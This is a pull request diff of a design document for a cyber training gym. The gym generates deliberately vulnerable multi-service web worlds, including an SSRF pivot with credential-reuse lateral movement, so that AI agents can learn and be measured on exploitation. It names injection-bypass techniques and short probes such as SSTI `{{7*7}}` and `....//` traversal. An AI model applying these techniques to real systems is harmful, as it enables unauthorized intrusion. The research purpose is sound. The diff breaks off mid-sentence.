### PR TITLE
Cyber: synthesize realistic multi-service company worlds (recon-pivot + lateral movement)

### DIFF
--- a/packs/cyber_webapp/DESIGN.md
+++ b/packs/cyber_webapp/DESIGN.md
@@ -647,19 +647,22 @@ following the SSRF `enables` chain (`_enable_closure`); cross-backing parity (`P
 vs the networked `CONTAINER`) stays the load-bearing check — only fidelity changes, not
 the task.
 
-**Lateral movement: credential reuse (built on this ground).** The richest chain this
-unlocks. The SSRF gains an opt-in *proxy* mode: the agent drives the pivot — bypass the
-scheme filter to make the public service fetch ANY internal host by name and forward the
-path and query, so the internal estate is the agent's to explore (a real `urlopen` on
-the container backing; the same in-process `/svc/<host>` dispatch on `PROCESS`, so parity
-still holds). An internal service leaks a db credential and how to use it; an
-internal db gates the flag behind that reused credential. The flag is reachable ONLY
-through the gate — the db record's own value is a decoy and the real flag sits in the
-gated secret, so neither the db's default endpoints nor a request without the credential
-can leak it. The agent recons the estate, pivots to the metadata host, then reuses the
-credential it found to open the db on a *different* host: genuine host-to-host lateral
-movement, the project's stated stage after §10. Opt-in and additive — the direct-pivot
-worlds above are untouched.
+**Lateral movement: a synthesized credential chain (built on this ground).** The richest
+worlds this unlocks — and the first that are *composed* rather than hand-shaped. The SSRF
+gains an opt-in *proxy* mode: the agent drives the pivot — bypass the scheme filter to
+make the public service fetch ANY internal host by name and forward the path and query,
+so the internal estate is the agent's to explore (a real `urlopen` on the container
+backing; the same in-process `/svc/<host>` dispatch on `PROCESS`, so parity still holds).
+On top of it the engine **synthesizes** a credential-reuse chain of *sampled depth* from
+one composable primitive: an entry host leaks a db credential, each gated host validates
+the credential leaked one hop back and relays the next, and the last serves the flag. One
+preset therefore synthesizes 1-, 2-, 3-hop chains across seeds — a distribution, not a
+fixed shape. The flag is reachable ONLY through the final gate — the db record's value is
+a decoy and the real flag sits in the gated secret — so no default endpoint and no
+un-credentialed request can leak it. Genuine host-to-host lateral movement, the project's
+stated stage after §10; opt-in and additive (the direct-pivot worlds are untouched). The
+composable hop is exactly the action a search-based sampler (#193) would compose and
+score — the substrate for "synthesize, don't hand-shape."
 
 **What comes next, on this ground.** Graph-driven lazy realization (#235) once worlds
 outgrow what is cheap to fully realize; then k8s (#189).

--- a/packs/cyber_webapp/DESIGN.md
+++ b/packs/cyber_webapp/DESIGN.md
@@ -2,32 +2,30 @@
 
 How this pack generates worlds, and why it generates them the way it does. The
 [README](README.md) shows *what* one built world looks like; this explains the
-*generator* behind it and the direction it's being taken: **staged, procedural,
-constraint-propagating generation** that produces a wide range of exploit types
-while staying solvable by construction.
+*generator* behind it: **staged, procedural, constraint-propagating generation**
+that produces a wide range of exploit types while staying solvable by construction.
 
-Audience: anyone extending the builder, the vulnerability catalog, or the
-ontology — and the sim-to-real study that depends on the gym being *broad*.
+Audience: anyone extending the builder, the vulnerability catalog, or the ontology —
+and the sim-to-real study that depends on the gym being *broad*.
 
 ---
 
-## 1. The bet, restated for generation
+## 1. The bet, and the constraints it forces
 
-The gym's job is to be a **cheap, reproducible, solvable source of training
-worlds** whose exploit skills transfer to real benchmarks. Three constraints
-fall straight out of that and decide the whole design:
+The gym is a **cheap, reproducible, solvable source of training worlds** whose exploit
+skills transfer to real benchmarks. Three constraints fall straight out of that and
+decide the whole design:
 
-- **Reproducible.** `snapshot_id = graph.content_hash()`. Same builder + manifest
-  + seed → the same world, byte for byte. A nondeterministic generator breaks the
-  thing OpenRange is built on.
-- **Cheap at scale.** The bet is worlds by the thousand. Per-world cost has to be
-  near zero.
-- **Solvable by construction.** Every task is admission-checked before an episode;
-  a generator that mostly produces unsolvable worlds and leans on
-  reject-and-repair is wasteful.
+- **Reproducible.** `snapshot_id = graph.content_hash()`. Same builder + manifest +
+  seed → the same world, byte for byte. A nondeterministic generator breaks the thing
+  OpenRange is built on.
+- **Cheap at scale.** The bet is worlds by the thousand, so per-world cost is near zero.
+- **Solvable by construction.** Every task is admission-checked before an episode; a
+  generator that mostly produces unsolvable worlds and leans on reject-and-repair is
+  wasteful.
 
 All three point the same way: **the correctness-critical core of generation is
-procedural, not LLM-driven.** This is not anti-LLM; it's where the line falls.
+procedural, not LLM-driven.** Not anti-LLM — it's where the line falls.
 
 ---
 
@@ -36,49 +34,33 @@ procedural, not LLM-driven.** This is not anti-LLM; it's where the line falls.
 | | owns | why |
 | --- | --- | --- |
 | **Procedural** (the core) | the vuln mechanic, exploitability, feasibility, chaining, flag placement, base parameterization | must be deterministic, cheap, reproducible, solvable-by-construction |
-| **LLM** (a later layer, *behind admission*) | open-ended structural diversity within a class, surface realism that pools can't cover | benefits from variety; a hallucination is **rejected by admission**, never trusted |
+| **LLM** (a layer behind admission) | open-ended structural diversity within a class, surface realism that pools can't cover | benefits from variety; a hallucination is **rejected by admission**, never trusted |
 
-The line is sharp: **the LLM never generates the thing that must be correct.**
-Admission is what makes any LLM use safe — generate, then verify the exploit
-actually fires; a bad generation is dropped, not shipped. This is the
-"self-verifying generation" the gym rests on.
+The line is sharp: **the LLM never generates the thing that must be correct.** Admission
+makes any LLM use safe — generate, then verify the exploit actually fires; a bad
+generation is dropped, not shipped. This is the "self-verifying generation" the gym
+rests on. The lineage is pre-LLM: **LAVA** (automated vulnerability addition) and **NIST
+Juliet/SARD** (procedurally generated CWE samples) injected exploitable bugs *with known
+triggers* — self-verifying by construction, already the OpenRange model.
 
-This is well-trodden ground. Pre-LLM, **LAVA** (automated vulnerability addition)
-and **NIST Juliet/SARD** (tens of thousands of procedurally generated CWE samples)
-injected exploitable bugs *with known triggers* — self-verifying by construction.
-That is already the OpenRange model.
-
-Note even *realism* is procedural-first: realistic names and content come a long
-way from curated pools sampled deterministically (`customer-portal`,
-`alice@corp.example`), no model required ([#192](https://github.com/vecna-labs/open-range/issues/192)).
-Reserve the LLM for diversity that pools and parameterized templates genuinely
-can't reach — and accept that an LLM in the build path trades pure seed-determinism
-for cache-keyed determinism (cache outputs by `(seed, prompt)`), which is a real
-cost to pay only where it buys something.
+Even *realism* is procedural-first: realistic names and content come a long way from
+curated pools sampled deterministically (`customer-portal`, `alice@corp.example`), no
+model required ([#192](https://github.com/vecna-labs/open-range/issues/192)). The LLM is
+reserved for diversity that pools and parameterized templates genuinely can't reach — and
+an LLM in the build path trades pure seed-determinism for cache-keyed determinism (cache
+by `(seed, prompt)`), a cost paid only where it buys something.
 
 ---
 
 ## 3. Staged, constraint-propagating generation
 
-The principle: **generate the world in ordered layers, each layer's output
-*bounding* the next layer's choices.** Top-down, not flat. This is what keeps a
-world coherent, makes feasibility hold incrementally instead of being discovered
-after the fact, and keeps each step a small sampling problem.
+The world is generated in **ordered layers, each layer's output bounding the next
+layer's choices** — top-down, not flat. This keeps a world coherent and makes
+feasibility hold incrementally instead of being discovered after the fact, and keeps
+each step a small sampling problem.
 
-The builder (`sampling.py::sample_graph`) **already does this in embryo.** It runs
-network → services → hosts/endpoints → data store → flag → accounts → vulns, and
-it already propagates one constraint: the flag's location fixes
-`oracle_service_id`, which the vuln stage consumes (the oracle vuln must land on
-the path to the flag).
-
-What's missing is that **one stage hardcodes a single choice.** Flag placement is
-always a DB record (`sample_graph`, the `record`/`data_store` block). That one
-decision is why all three vuln classes are "leak-via-DB-response": the loot is
-always a row, so only response-leak exploits can reach it. The narrowness is not
-"few templates" — it is *one loot stage with one shape.*
-
-The fix is to make loot placement a real layer that **picks a shape and emits it
-as the constraint** the rest of the pipeline already knows how to consume:
+`sampling.py::sample_graph` runs network → services → hosts/endpoints → loot →
+flag → accounts → vulns. The load-bearing propagation is loot → vuln:
 
 ```
 loot-placement → picks loot shape ∈ {db-row, file, exec-reachable}   ← the constraint
@@ -88,581 +70,398 @@ vuln-selection → picks an oracle vuln whose exploit reaches that shape
 realization    → renders the template + wires the exploit → flag path
 ```
 
-Because the vuln is *chosen to match the loot*, the chain is reachable **by
-construction** — no extra reject-and-repair. That is the deep win of staging:
-solvability is assembled layer by layer. The same pattern generalizes upward to
-enterprise scale ([#212](https://github.com/vecna-labs/open-range/issues/212)):
-org → team → service → data → vuln, each layer bounding the next.
+Because the oracle vuln is *chosen to match the loot*, the chain is reachable **by
+construction** — no reject-and-repair. That is the deep win of staging: solvability is
+assembled layer by layer. The same pattern generalizes upward to enterprise scale
+([#212](https://github.com/vecna-labs/open-range/issues/212)): org → team → service →
+data → vuln, each layer bounding the next.
 
 ---
 
 ## 4. Exploit *shapes*, not CWE names
 
-Organize the catalog by **exploit shape** — *how the flag is reached* — not by CWE
-label. The shape is the unit of real work (realizer + feasibility); classes within
-a shape are cheap templates on top.
+The catalog is organized by **exploit shape** — *how the flag is reached* — not by CWE
+label. The shape is the unit of real work (realizer + feasibility); classes within a
+shape are cheap templates on top. The shape is also the **agent capability** the study
+measures (H2, "which capabilities survive simulation," is per-shape by nature), so
+shape-organization is the study's axis, not tidiness.
 
-| shape | how the flag is reached | classes | loot |
-| --- | --- | --- | --- |
-| **response-leak** *(have)* | exploit returns the flag in an HTTP response | `sql_injection`, `ssrf`, `broken_authz` | DB row |
-| **file-read** *(new)* | exploit reads a file holding the flag | `path_traversal`, `lfi`, `xxe` | file |
-| **code-exec** *(new)* | exploit runs code that reads the flag | `command_injection`, `ssti`, `deserialization` | exec-reachable file/env |
+| shape | how the flag is reached | classes |
+| --- | --- | --- |
+| **response-leak** | exploit returns the flag in an HTTP response | `sql_injection`, `ssrf`, `broken_authz`, `idor`, `weak_credentials` |
+| **file-read** | exploit reads a file holding the flag | `path_traversal`, `xxe` |
+| **code-exec** | exploit runs code that reads the flag | `command_injection`, `ssti` |
 
-Shapes are also the **agent capability** the study measures: H2 ("which
-capabilities survive simulation") is per-shape by nature. So shape-organization is
-not tidiness — it is the study's axis.
-
----
-
-## 5. Ontology decision: reuse `data_store`, no new kind
-
-File-read and code-exec loot lives somewhere other than a DB row. The decision:
-**reuse `data_store`, not a new node kind** — and the ontology already
-accommodates it. `data_store.kind` is `{sql, kv, file, object}` and `engine` is
-`{sqlite, postgres, mysql, redis, fs, s3}` (`ontology.py`), so filesystem loot is
-just `kind=file, engine=fs`: **no ontology change, only realizer support.** Such a
-store materializes its record as a real file under the owning service;
-path-traversal reads it directly, command-injection `cat`s it. One shape, two
-exploit classes. (The current sampler only ever emits `kind=kv, engine=redis` — the
-filesystem values are unused, not unsupported.)
-
-Feasibility generalizes from today's DB-path check to "a loot path of the matching
-shape exists from the entrypoint" — the structural check stays per-*shape*, not
-per-*class*.
+Each class is proven end to end by a real HTTP exploit that recovers the flag
+(`tests/test_cyber_staged_generation.py`). Loot shape and class mix are
+manifest-configurable (`loot_shapes` / `vuln_kinds`).
 
 ---
 
-## 6. The narrowness this addressed (the starting point)
+## 5. Ontology: file/exec loot reuses `data_store`
 
-- **Was: 3 vuln classes, 1 shape.** `sql_injection`, `ssrf`, `broken_authz` —
-  all `family=code_web`, all targeting `endpoint`, all response-leak. The staged
-  pipeline took this to 9 classes across 3 shapes (see Status, §7).
-- **Was: structurally fixed templates → now payload-context diversity.** The
-  SQLi template used to be always `... WHERE key = '{input}'` — only names varied,
-  so an agent learns *the template*, not "SQL injection." Because the agent only
-  sees the HTTP surface (never server code), the fix is to vary the **injection
-  context** the exploit must adapt to, sampled per build. Crucially the three
-  contexts per class are **mutually exclusive**: the handler enforces each one's
-  requirement, so a payload that solves one build *fails* the other two — an agent
-  can't memorize one string and replay it. SQLi single/numeric/double quoting;
-  cmdi separator/substitution/quoted (each strips the others' vectors); path
-  traversal absolute-only/relative-`../`/`....//`-past-a-single-strip; SSTI
-  attribute/comment/expr sink; XXE element/wrapped-root/scheme-prefix; SSRF
-  scheme-block/host-allowlist/decimal-IP; IDOR direct/base64/prefixed; broken-authz
-  single/dual-factor/encoded; weak-creds pair/combined/basic. A live 3×3 replay
-  matrix per class confirms it: **all 9 classes are fully diagonal** (every
-  off-diagonal cell rejects), so the single-payload replay floor is **~33%, down
-  from ~67%** — an agent must learn all three techniques, not memorize one. (XXE's
-  `element_content` vs `wrapped_root` was the last superset cell; it's closed by
-  having `element_content` reflect only the root's *direct* text while
-  `wrapped_root` nests the entity a level deeper — distinct positions, not a
-  collapsed root-name swap.)
-
-  *Wrong-context feedback.* A neutralized but attack-shaped attempt returns a
-  response distinct from a benign miss (path traversal `403` vs `404`; cmdi
-  `"input rejected"` vs the diagnostic echo; ssti `"template directive ignored"`
-  vs a plain render) — so the agent learns it's hitting the right vuln class with
-  the wrong technique. These reshape only the *non-leak* responses, so the
-  replay matrix is unchanged.
-
-  *Structural variety, honestly.* Path traversal samples base dirs of **varied
-  depth (2–5)**, so the `../` count is build-specific structure the agent reads
-  off the world. But the asymmetry is partly intrinsic: SQLi embeds world state
-  (table + column) in the payload (≈108 distinct structures), while a file-read /
-  cmd-exec payload embeds only the discovered path (a handful) — those classes
-  carry their diversity in *three distinct techniques* per build, not in payload
-  structure. *Threat to validity (documented):* for `sql_injection`, `idor`, and
-  `weak_credentials` the three contexts are disjoint *serializations* of one skill
-  (a quote/encoding swap), not three distinct competencies — they defeat replay
-  but don't broaden the skill the way cmdi / path / ssti / xxe / ssrf /
-  broken-authz do. Richer structural variety and natural-language realism remain
-  the later LLM layer.
+File-read and code-exec loot lives somewhere other than a DB row, and the ontology
+already accommodates it: `data_store.kind` is `{sql, kv, file, object}` and `engine` is
+`{sqlite, postgres, mysql, redis, fs, s3}` (`ontology.py`). So filesystem loot is just
+`kind=file, engine=fs` — **no new node kind, only realizer support**. Such a store
+materializes its record as a real file under the owning service; path-traversal reads it
+directly, command-injection `cat`s it — one shape, two exploit classes. Feasibility is a
+per-*shape* structural check ("a loot path of the matching shape exists from the
+entrypoint"), not per-*class*.
 
 ---
 
-## 7. Goal — what this doc is here to make true
+## 6. Replay resistance: mutually-exclusive payload contexts
 
-> **Generalize the loot → vuln → realization staging so the gym produces 3 exploit
-> shapes (response-leak, file-read, code-exec) across ~8 vuln classes — every world
-> solvable by construction because the vuln is chosen to match the loot — keeping
-> every correctness-critical layer procedural, with the LLM diversity/realism layer
-> left as a later admission-gated stage.**
+A structurally fixed template teaches *the template*, not the technique: if SQLi is
+always `... WHERE key = '{input}'`, an agent memorizes one string and replays it. Since
+the agent only ever sees the HTTP surface (never server code), each class instead samples
+an **injection context** per build, and the three contexts of a class are **mutually
+exclusive** — the handler enforces each one's requirement, so a payload that solves one
+build *fails* the other two:
 
-### Work breakdown
+> SQLi single/numeric/double quoting; cmdi separator/substitution/quoted (each strips the
+> others' vectors); path traversal absolute-only / relative-`../` / `....//`-past-a-single-strip;
+> SSTI attribute/comment/expr sink; XXE element / wrapped-root / scheme-prefix; SSRF
+> scheme-block / host-allowlist / decimal-IP; IDOR direct/base64/prefixed; broken-authz
+> single/dual-factor/encoded; weak-creds pair/combined/basic.
 
-1. **Loot-placement stage.** Lift the hardcoded DB-record block into a staged
-   choice over loot shape (`db-row` / `file` / `exec-reachable`), prior-weighted,
-   emitting the shape as the constraint.
-2. **Filesystem loot.** Allow `data_store.engine = filesystem`; realizer
-   materializes its record as a real file on the owning service.
-3. **Shape-tagged catalog + selection.** Tag each `Vulnerability` with its shape;
-   the vuln stage picks an oracle whose shape matches the placed loot.
-4. **Two new shapes, end-to-end.** `path_traversal` (file-read) first — it stands
-   up the whole file-store pipeline at lower risk — then `command_injection`
-   (code-exec), which reuses the same in-memory file store for near-free.
-5. **Feasibility per shape.** Generalize the pentest structural check to verify the
-   matched loot→vuln path for each shape.
-6. **Tests + proof.** A real pentest episode recovering the flag for each new
-   shape; admission proves each world well-posed; determinism holds (same seed +
-   shape → same snapshot).
-7. **Fan-out.** `ssti`, `xxe`, `weak_credentials`, `idor` as cheap additions once
-   their shape's pipeline exists.
+A 3×3 live replay matrix per class is **fully diagonal** — every off-diagonal cell
+rejects — so the single-payload replay floor is ~33%, down from ~67%: an agent must learn
+all three techniques. (XXE's `element_content` vs `wrapped_root` is kept distinct by having
+`element_content` reflect only the root's *direct* text while `wrapped_root` nests the
+entity a level deeper.)
 
-### Status
+**Wrong-context feedback.** A neutralized but attack-shaped attempt returns a response
+distinct from a benign miss (path traversal `403` vs `404`; cmdi `"input rejected"` vs the
+diagnostic echo; ssti `"template directive ignored"` vs a plain render), so the agent
+learns it has the right vuln class but the wrong technique. These reshape only the
+*non-leak* responses, so the replay matrix is unchanged.
 
-Items 1–7 are **done** (`feat/cyber-staged-generation`): the staged loot→vuln
-pipeline, the in-memory file store, shape-tagged catalog + shape-matched oracle
-selection, and the fan-out. The gym now spans **3 exploit shapes across 9
-classes**, each proven end to end by a real HTTP exploit that recovers the flag
-(`tests/test_cyber_staged_generation.py`):
+**The honest limit.** SQLi embeds world state (table + column) in the payload (≈108
+distinct structures); a file-read / cmd-exec payload embeds only the discovered path. For
+`sql_injection`, `idor`, and `weak_credentials` the three contexts are disjoint
+*serializations* of one skill (a quote/encoding swap), not three distinct competencies —
+they defeat replay but don't broaden the skill the way cmdi / path / ssti / xxe / ssrf /
+broken-authz do. Richer structural variety is the LLM layer's job (§2).
 
-| shape | classes |
-| --- | --- |
-| response-leak | `sql_injection`, `ssrf`, `broken_authz`, `idor`, `weak_credentials` |
-| file-read | `path_traversal`, `xxe` |
-| code-exec | `command_injection`, `ssti` |
+---
 
-Loot shape and vuln-class mix are manifest-configurable (`loot_shapes` /
-`vuln_kinds`); decoy files are sampled into the content-addressed graph (not
-hardcoded), so they vary by seed. Every class also samples a **payload-context
-axis** per build (§6) so the correct exploit differs build-to-build, the flag
-path is **discovered via a planted config** rather than guessed (and randomized
-so brute force doesn't pay), and the 4 once-toy classes run **real engines**
-(Jinja / `xml.sax` / `shlex`). This tracks
-[#190](https://github.com/vecna-labs/open-range/issues/190) and lays the staging
-groundwork for [#212](https://github.com/vecna-labs/open-range/issues/212).
+## 7. What is real vs emulated, and the difficulty tiers
 
-### Default loot mix, and what stays an emulation
+At the `PROCESS` backing the loot store is an in-memory map (the flag never lands on
+disk), but the exploits run against **real engines** wherever one fits in-process: SQL
+injection hits a real sqlite engine, SSTI a real sandboxed Jinja environment (`{{7*7}}` →
+49, a context dump leaks the store), XXE a real SAX parser with external-entity resolution,
+path traversal a real `posixpath` resolve, command injection a real `shlex` tokenizer
+honoring separators, `$()`/backtick substitution, and quoting. So the *technique* — not a
+magic string — is what the agent must produce, which is what transfers. The one thing
+`PROCESS` emulates is a real OS shell/filesystem with RCE; the **`CONTAINER`** backing
+(§9) makes those real. The default loot mix weights response-leak (`db: 7`, `file: 3`),
+the most common real web-exploit class; it is a starting point, not a claim about the
+"right" distribution.
 
-The default weights the response-leak shape (`db: 7`, `file: 3`) — the most common
-real web-exploit class — while still producing file/exec worlds out of the box; a
-study targets a shape or class by overriding `loot_shapes` / `vuln_kinds`. The
-default is a starting point, not a claim about the "right" distribution.
-
-At the `PROCESS` backing the loot store is an in-memory map (the flag never
-lands on disk), but the exploits run against **real engines** wherever one fits
-in-process: SQL injection hits a real sqlite engine, SSTI a real sandboxed Jinja
-environment (`{{7*7}}` → 49, context dump leaks the store), XXE a real SAX parser
-with external-entity resolution (a well-formed DOCTYPE/ENTITY/reference is
-required), path traversal a real `posixpath` resolve, and command injection a
-real `shlex` tokenizer honoring separators, `$()`/backtick substitution, quoting,
-and arbitrary readers. So the *technique* — not a magic string — is what the
-agent must produce, which is what makes it transfer. The one thing still emulated
-is a real OS shell/filesystem with RCE escalation: a **container backing
-([#252](https://github.com/vecna-labs/open-range/issues/252))** provides that.
-Because no real shell executes at `PROCESS` (the interpreters only read the
-store), there is nothing to sandbox yet;
-exec-sandbox hardening ([#202](https://github.com/vecna-labs/open-range/issues/202))
-lands with the container backing, before adversarial training traffic.
-
-### Trainability: live-agent validation and the difficulty tier
-
-Scripted-oracle tests (which exploit using the flag path read straight from the
-graph) prove a world is *solvable by construction* — they do **not** prove a real
-agent can solve it. Driving a real LLM agent through the actual episode harness
-(`run.run_episode` with a `claude -p` solver) revealed that the validity-hardened
-**standard** tier is too hard for a fresh agent: it solved only ~2 of 9 classes,
-because the thin instruction left it unable to classify the vuln and the
-discovery recon chain made file-loot a two-stage exploit it couldn't walk
-(`command_injection` failed even with rich hints and a 20-minute budget). Validity
-(replay-resistance, discovery-not-brute-force) and trainability trade off, and the
-hardening pushed past one-step real-agent solvability.
-
-So the gym carries a `difficulty` manifest knob:
+Validity and trainability trade off: the replay-hardened, recon-required world is too
+hard for a fresh agent to solve in one step, so the gym carries a `difficulty` knob.
 
 | tier | instruction | use |
 | --- | --- | --- |
 | `standard` (default) | thin (endpoint only); blind recon + classification, mutually-exclusive contexts | the H2 transfer **measurement** target |
-| `easy` / `guided` | names the vuln class, the flag's exact location, the sampled context, and a one-step payload recipe | **bootstrapping** — an agent learns to *execute* exploits before it has to *discover* them |
+| `easy` / `guided` | names the vuln class, the flag's location, the sampled context, and a one-step payload recipe | **bootstrapping** — learn to *execute* exploits before having to *discover* them |
 
-The agent still crafts and executes the real exploit at `easy`; only the recon and
-classification are removed. A live-agent matrix (9 classes × 2 contexts, a real
-agent through the real harness) solves **18/18 at `easy`** versus ~3/22 at
-`standard` — the gym is real-agent-trainable via the `easy` tier and a
-manifest-driven easy→standard curriculum. (Auto-curriculum via `auto_evolve` and a
-richer default instruction are the natural next steps —
-[#258](https://github.com/vecna-labs/open-range/issues/258).)
-
-### Out of scope here
-
-Client-side shapes (XSS, CSRF) need a victim NPC and wait. The LLM intra-class
-diversity layer (§2) waits — params vary per build today, but the code *shape*
-per class is fixed; richer structural variety is the documented next step.
+At `easy` the agent still crafts and executes the real exploit; only recon and
+classification are removed. A live-agent matrix solves 18/18 at `easy` versus ~3/22 at
+`standard`, so the gym is real-agent-trainable via an `easy → standard`
+curriculum. Client-side shapes (XSS, CSRF) need a victim NPC and are out of scope here.
 
 ---
 
-## 8. The verifier is the ceiling — verification, reward, and the path past plant-by-construction
+## 8. The verifier is the ceiling
 
-§2 set the line: procedural owns correctness, the LLM owns variety behind
-admission. This section answers the three questions that line raises once you take
-it seriously — *what is the verifier, why does it set the agent's ceiling, and how
-does generation move to the LLM without losing the measurement* — and records the
-direction decided for the sim-to-real study.
+§2 set the line: procedural owns correctness, the LLM owns variety behind admission. This
+section answers what that line raises — *what the verifier is, why it sets the agent's
+ceiling, and how generation moves to the LLM without losing the measurement.*
 
 ### 8.1 Two ways to prove a world solvable
 
-A generated world is training data only if it is provably solvable, and the proof
-is always the same shape: exhibit a solution a checker accepts. Two places to put
-that proof:
+A generated world is training data only if it is provably solvable, and the proof always
+has the same shape: exhibit a solution a checker accepts. Two places to put that proof:
 
-- **Plant-by-construction** (today, §3; the LAVA / Juliet lineage). Staging plants
-  a known vuln so a known technique reaches a planted flag; `pentest.py::check_success`
-  confirms `submitted == flag.value_ref`. Deterministic, cheap, reproducible — and
-  **bounded by the catalog**: the agent can only learn the classes we plant.
-- **Generate-then-verify** (the AgentWorld lineage). An LLM writes the world *and*
-  a solver *and* a checker; admit if the solver passes the checker. General and
-  realistic — but the proof is only as trustworthy as the LLM that wrote it, and
-  **a generator and a verifier that are the same model share blind spots**: the toy
-  `{{7*7}}` engines our own audit caught (§6, since fixed) *passed their own tests*.
-  A self-checking LLM loop admits exactly those.
+- **Plant-by-construction** (§3; the LAVA / Juliet lineage). Staging plants a known vuln
+  so a known technique reaches a planted flag; `pentest.py::check_success` confirms
+  `submitted == flag.value_ref`. Deterministic, cheap, reproducible — and **bounded by the
+  catalog**: the agent can only learn the classes we plant.
+- **Generate-then-verify** (the AgentWorld lineage). An LLM writes the world *and* a solver
+  *and* a checker; admit if the solver passes the checker. General and realistic — but the
+  proof is only as trustworthy as the LLM that wrote it, and **a generator and a verifier
+  that are the same model share blind spots** (a self-checking loop admits exactly the toy
+  engines it can't see are toys).
 
-Neither is the answer alone. Plant-by-construction is measurement-grade but capped;
-generate-then-verify scales but self-certifies. The synthesis is to **take the
-LLM's generator and refuse its verifier-as-truth** — keep an independent verifier,
-and never let the model own the flag or the checker.
+Neither alone is the answer: plant-by-construction is measurement-grade but capped;
+generate-then-verify scales but self-certifies. The synthesis is to **take the LLM's
+generator and refuse its verifier-as-truth** — keep an independent verifier, and never let
+the model own the flag or the checker.
 
 ### 8.2 The verification ladder
 
-Order verifiers by trust, lowest ceiling to highest:
+Verifiers ordered by trust, lowest ceiling to highest:
 
 | rung | verifier | judge? | ceiling |
 | --- | --- | --- | --- |
-| 1 | **planted-flag match** (`check_success` today) | none | the catalog |
+| 1 | **planted-flag match** (`check_success`) | none | the catalog |
 | 2 | **report ↔ graph structure** — agent's `{kind, endpoint, technique}` vs the graph's `vulnerability` node + `affects` edge | none | declared vulns |
 | 3 | **invariant violation** — a `HIDDEN` value reaches output it shouldn't | none | the invariants you state |
 | 4 | **execution effect** — a real boundary crossed in a sandbox | none | what you instrument |
 | 5 | **LLM judge** | yes | the judge |
 
-The design rule: **push verification down this ladder, reserve the judge for the
-irreducible tail.** Rungs 1–4 are mechanical and judge-free; only genuinely
-ambiguous findings (subtle logic flaws, disclosure of debatable sensitivity) need
-rung 5. So the gym is *not* fundamentally capped at a judge — it is capped by how
-much of "what counts as a violation" we can mechanize, and rungs 3–4 mechanize most
-of security.
+The rule: **push verification down this ladder, reserve the judge for the irreducible
+tail.** Rungs 1–4 are mechanical and judge-free; only genuinely ambiguous findings (subtle
+logic flaws, debatable disclosure) need rung 5. So the gym is not fundamentally capped at a
+judge — it is capped by how much of "what counts as a violation" we mechanize, and rungs
+3–4 mechanize most of security. Rung 2 needs no new primitive: its ground truth is already
+in the graph as **edges** (`holds`, `affects`) and `Visibility.HIDDEN` on the secret.
 
-There is no `Claim` primitive in the graph (`_ir.py` has `Node`, `Edge`,
-`Visibility`, `Role`). Rung 2's "ground truth" is already present as **edges**:
-`holds` ("this record holds this secret in this field"), `affects` ("this vuln
-affects this endpoint"), and `Visibility.HIDDEN` on the secret. A report-vs-graph
-check matches against those — no new primitive, no judge.
+### 8.3 The spine: one check unifies the ladder
 
-### 8.3 The spine: one change unifies the ladder
+The whole architecture lands on a single generalization of `check_success`. Instead of
+*did the one planted flag appear in a response* (`submitted == flag.value_ref`), the
+consequence verifier (`consequence.py`) asks *did any `HIDDEN` value reach output it
+should not have* — so the same function serves rung 1 **and** rung 3. That one move:
 
-The whole architecture lands on a single generalization of code that already
-exists. `check_success` today asks *did the one planted flag appear in a response*:
-
-```
-expected = flag.attrs["value_ref"]; ok = submitted == expected
-```
-
-Generalize it to *did any `HIDDEN` value reach output it should not have* — and the
-same function becomes rung 1 **and** rung 3. That one move:
-
-- **keeps planted mode** (the planted flag is a `HIDDEN` value, so the check still
-  fires);
-- **unlocks emergent mode** (a leak the generator never planted still trips it — no
-  planted flag required);
-- **is the judge-free verifiable reward** a GRPO trainer needs (a programmatic
-  check — the cyber analog of "is the math answer correct");
+- **keeps planted mode** (the planted flag is a `HIDDEN` value, so the check still fires);
+- **unlocks emergent mode** (a leak the generator never planted still trips it);
+- **is the judge-free verifiable reward** a GRPO trainer needs (a programmatic check — the
+  cyber analog of "is the math answer correct");
 - **catches novel exploits**, because it watches the *consequence* (a hidden value
   escaped), not a *mechanism* (a specific CWE).
 
-This is the spine of everything below: a ~10-line generalization of
-`pentest.py::check_success`, validated against worlds we already trust. (Whether a
-leak came via the *intended* technique or a shortcut is a separate question — the
-mutual-exclusivity / no-shortcut probe of §6 is the validity gate; consequence
-verification supplies the *reward*, the shortcut probe supplies the *label*.)
+Whether a leak came via the *intended* technique or a shortcut is a separate question: the
+mutual-exclusivity / no-shortcut probe of §6 is the validity *gate* (the label),
+consequence verification supplies the *reward*.
 
 ### 8.4 Instrument consequences, not mechanisms
 
-Mechanisms are infinite and evolving; you cannot enumerate them, and enumerating
-them *is* the catalog ceiling. **Consequences are few and stable** — an
-unauthenticated read of `HIDDEN` data, a write across a boundary, code execution,
-exfil of a planted canary. Instrument the consequence and a mechanism that reaches
-it is confirmed regardless of how it got there — including one the generator never
-intended. That is how the gym exceeds the model that builds it.
+Mechanisms are infinite and evolving — enumerating them *is* the catalog ceiling.
+**Consequences are few and stable**: an unauthenticated read of `HIDDEN` data, a write
+across a boundary, code execution, exfil of a canary. Instrument the consequence and a
+mechanism that reaches it is confirmed regardless of how it got there — including one the
+generator never intended. That is how the gym exceeds the model that builds it.
 
-The honest qualifier: the oracle matches by substring, but it searches for the value
-**and its cheap reversible encodings** — base64, hex, percent-encoding — by encoding
-the *needle*, so a base64/hex/url-encoded exfil is caught, not only the literal form.
-Still out (these would need decoding the body, not encoding the needle): gzip/binary
-transforms, multibyte splits, bespoke schemes. The live per-response signal is raw and
-un-de-duplicated; the offline verifier and the grader (which hold the graph) apply
-containment de-duplication when multiple guarded values overlap.
+The oracle matches by substring, but searches for the value **and its cheap reversible
+encodings** (base64, hex, percent-encoding) by encoding the *needle*, so an encoded exfil
+is caught, not only the literal form. Out of reach (these need decoding the body, not
+encoding the needle): gzip/binary transforms, multibyte splits, bespoke schemes. The live
+per-response signal is raw; the offline verifier and grader (which hold the graph)
+de-duplicate by containment when guarded values overlap. How far the verifier reaches is
+gated by backing:
 
-How far this reaches is gated by backing (§"what stays an emulation"):
-
-- **At `PROCESS` (now):** the only observable consequence is a value reaching an
-  HTTP response — response-leak. `check_success`'s `flag_from_response` is already
-  this in embryo; generalizing it to *any* `HIDDEN` value (8.3) is in reach today.
-- **At `CONTAINER` ([#252](https://github.com/vecna-labs/open-range/issues/252) /
-  [#202](https://github.com/vecna-labs/open-range/issues/202), Docker-blocked
-  locally):** real OS effects — a file read outside web root, a process spawned —
-  become observable. File-read and code-exec consequences light up only here. This
-  is the gating dependency for the upper ladder, and it is the same container the
-  benchmarks ride on.
+- **At `PROCESS`:** the only observable consequence is a value reaching an HTTP response —
+  response-leak.
+- **At `CONTAINER`:** real OS effects — a file read outside web root, a process spawned —
